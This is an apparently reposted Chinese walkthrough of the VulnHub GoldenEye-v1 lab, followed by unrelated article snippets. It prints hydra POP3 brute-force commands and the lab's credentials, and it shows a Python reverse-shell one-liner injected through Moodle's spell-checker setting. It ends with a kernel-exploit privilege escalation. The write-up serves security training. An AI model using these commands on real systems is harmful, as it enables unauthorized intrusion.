vulnhub靶机：GoldenEye-v1_prettyX的博客-程序员秘密

技术标签：靶机

靶机介绍

靶机下载地址：https://www.vulnhub.com/entry/goldeneye-1,240/

开始

1、ip探测，本次靶机的ip为：192.168.1.109

//kali
arp-scan -l

2、nmap端口扫描

3、先尝试访问80端口

4、访问robots.txt，404

5、查看网页源码

6、继续查看这个.js文件

“Boris，确保你升级了你的默认密码...”

这个人应该叫Boris，下面是他的默认密码

7、html解码

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;

结果是：InvincibleHack3r

8、首页信息，叫我们访问/sev-home/，过去看看

需要认证，用上面获得用户名、密码试一下

好吧，用户名首字母需要小写

用户名：boris

密码：InvincibleHack3r

9、登录成功

提示，在非默认端口，开了pop3服务

在上面，nmap已经扫过了，55007开的pop3端口

10、再次查看源码，在页面的最底部

11、使用hydra爆破

爆破成功，所以说，一个强大的字典很关键，但是也有局限性

hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.1.109 -s 55007 pop3

12、可以使用nc 登录

13、这里我们使用foxmail登录，配置如下

14、在Natalya账户中，发现线索

15、根据邮件内容，修改/etc/hosts文件

将靶机IP，关联到邮件提示的域名上

//kali
vim /etc/hosts

16、访问 severnaya-station.com/gnocertdir

17、我们点击，login，用邮件的用户名、密码尝试登录，在第14步中

成功登录

18、继续找线索，找到一个未读消息

获取另一位用户的用户名：doak

19、又用hydra来爆破...

20、foxmail登录，又发现另一个人的账户

21、在moodle训练平台上登录，登录成功

发现一份.txt，下载看看

22、根据提示，查看这个图片，也是醉了

右键描述

base64解码

xWinter1995x!

23、继续搜索线索，在未读消息中，发现管理员用户

24、Logout，尝试admin登录

登录成功，该拿Shell了

25、根据参考文章，需要先更改设置

Plugins-Text editors-TinyMCE，Spell engine选项修改为PSpellShell

26、在如下选项卡中，添加反弹Shell代码

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.109",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

27、本地nc监听端口

28、在如下选项卡下，随便输入，再点击Toggle spellchecker

29、GetShell，这个Shell太艰辛...

Python交换式Shell

python -c 'import pty; pty.spawn("/bin/bash")'

30、下一步该提权了，查看内核版本，uname -a

31、查找对应漏洞

32、Python开启Web服务

//Kali
python3 -m http.server

33、download

34、目标机器，并未安装gcc，这里我们使用cc编译，需要修改源码一处代码，将gcc改为cc

35、下载、cc编译、添加权限、执行

ROOTTTTTT!

结束。

参考文章：

https://www.anquanke.com/post/id/156098

https://www.cnblogs.com/appear001/p/12033240.html

https://blog.csdn.net/adminuil/article/details/103824141

本文链接：https://blog.csdn.net/prettyX/article/details/105340528

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

prometheus使用 (十六) alertmanager特性--告警抑制_默子昂的博客-程序员秘密_alertmanager 抑制

2. 抑制抑制是指当某?告警发出后，可以停?重复发送由此告警引发的其它告警的机制。例如，当集群不可访问时触发了?次告警，通过配置Alertmanager可以忽略与该集群有关的其它所有告警。这样可以避免接收到?量与实际问题?关的告警通知。抑制机制同样通过Alertmanager的配置?件进?设置。抑制是指某一告警发出后，可以停止重复发送由此告警引发的其他告警的机制（我们也不想，节点一宕机，pod全给你报错吧）例如: 集群不可访问时触发了一次告警，通过配置alertmanager可以忽...

前端后端分离知识点学习(二)_Cas狗的博客-程序员秘密

前端后端分离知识点学习(二)一、常用的前端模板网站1、Bootstrap自带模板；2、StartBootstrap模板；3、vali-admin的模板；4、百度相关模板；二、beego模板技术搭建页面1、引入css

PTA浙大版《Python 程序设计》题目集_Re:从零开始的代码生活的博客-程序员秘密_pta浙大答案

本题目集是在2021年初写的，当时受疫情影响，题目集是对所有用户开放的，后来题目集就有权限了，需要购买浙大的Python教材才能用。题目集记录了我初学Python时的经历，所以前几道题看起来会不符合Python简洁的特性。初学Python时，没有老师教我，完全就是在自学，所以不会做的题也会上网上搜答案，这就导致题目集中有些题和网上的很相似。其他题目集：PTA浙大版《C语言程序设计实验与习题指导（第3版）》题目集（参考代码）PTA浙大版《C语言程序设计（第3版）》题目集（参考代码）PTA团体程序设

算法与数据结构基础（三）之遍历二叉树_duter_sun先生的博客-程序员秘密

算法与数据结构基础（三）之遍历二叉树前序遍历（递归）中序遍历（递归）后序遍历（递归）测试代码前序遍历（递归）void PreOrder(Node* pParent){ if (pParent == nullptr) return; cout << pParent->value << " "; PreOrder(pParent->left); P...

springboot war打包步骤_c_zyer的博客-程序员秘密

springboot war打包步骤，注意点，出现的问题packaging的设置<packaging>war</packaging> 修改pom.xml文件依赖

string与char*转换(经vs2019测试可行）_lǜ酒红炉zhī影斜的博客-程序员秘密

1.string转换为CString：CString string2CString(string StrData){CString CStrData(StrData.c_str());return CStrData;}2.CString转换为string：string CString2string(CString csStrData){string strRet ;char s...

随便推点

Xilinx Multiboot实例演示_碎碎思的博客-程序员秘密

原理关于Multiboot的原理参考《Xilinx 7系列FPGA Multiboot介绍-远程更新》，基本原理都在此文写的很清楚，本文主要从实例出发演示Multiboot。补充FPGA ...

GB18030字符编码格式和点阵字库_何事误红尘的博客-程序员秘密_gb18030

中国国bai家标准GB2312就是简体中文字符集；台湾计算机界使用的BIG5码是繁体字中文字符集；日本的JIS X0208标准是日文汉字字符集；韩国的KS C5601是韩国汉字字符集。ANSI（美国国家标准学会）推出了一种双字节编码的标准，将上述三国四方的字符集加以统一，称为 ANSI 编码。在简体中文操作系统中，ANSI 编码代表 GBK 编码；在日文操作系统中，ANSI 编码代表 Shift_JIS 编码。不同 ANSI 编码之间互不兼容，在国际间信息交流时，无法将属于两种语言的文字，存储在同一段 .